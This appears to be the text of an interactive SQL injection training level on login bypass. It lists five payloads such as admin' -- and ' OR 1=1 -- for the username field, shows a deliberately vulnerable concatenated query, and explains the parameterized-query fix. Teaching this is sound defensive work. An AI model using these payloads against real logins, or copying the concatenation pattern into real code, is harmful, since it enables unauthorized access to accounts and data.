Level 01 · Login Bypass

Authentication without authentication

The query concatenates your input directly into a SQL string. Your input isn't just data — it's syntax. Find a way to log in as admin without knowing the password.

Objective

Loading SQLite engine

Username

Password

Live Query · Results

SQL EXECUTED

// Submit the form to see the query

Try these payloads (click to copy into username field)

admin' -- Comments out the password check entirely. Logs in as admin.
' OR 1=1 -- Always-true condition. Returns the first user (probably admin).
' OR username='alice' -- Log in as a specific named user without their password.
' UNION SELECT 1,'fake','admin' -- Fabricate a row entirely. The login succeeds against fictional data.
x' OR '1'='1 Closes the quote, adds an always-true condition, balances quotes naturally.

Why this works

[ EXPLANATION ]

The vulnerable code builds the SQL query by string concatenation:

query = "SELECT id, username, role FROM users WHERE username = '" + username + "' AND password = '" + password + "'"

When you submit the username admin' --, the resulting SQL becomes:

SELECT id, username, role FROM users WHERE username = 'admin' --' AND password = 'anything'

Everything after -- is a comment in SQL. The password check is gone. The query just says "find a user where username = 'admin'" — and there's exactly one. You're in.

The fix — parameterized queries. The driver sends the query template and the parameter values as separate things over the wire. The database engine never parses your input as SQL. Toggle Safe mode above and run the same payloads. They become literal usernames containing weird characters, and the lookup fails like it should.